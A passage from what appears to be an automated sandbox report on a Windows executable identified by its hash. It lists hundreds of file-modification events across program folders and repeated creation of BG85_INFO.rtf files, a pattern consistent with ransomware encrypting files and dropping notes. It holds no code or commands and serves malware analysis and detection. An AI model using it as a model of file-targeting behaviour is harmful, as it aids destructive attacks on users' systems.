Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\README.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\LICENSE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\org.eclipse.rcp_root_4.4.0.v20141007-2301 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookicon.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.sun.el_2.2.0.v201303151357.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Ojinaga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome.exe.sig c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\tzmappings c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\LICENSE c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\lua\meta\reader\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Uzhgorod c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.css.sac_1.3.1.v200903091627.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Cape_Verde c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\La_Rioja c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\ResourceInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tallinn c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Moscow c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-loaders.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_pwa_launcher.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Godthab c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\bin\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\ui.js c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Juan c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\sunec.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\cmm\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ImportRemove.m3u c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jdb.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightItalic.ttf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\PopStop.vb c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-spi-quicksearch.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\calendars.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\ConvertFromPush.TTS c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\blank.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pt-BR.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver 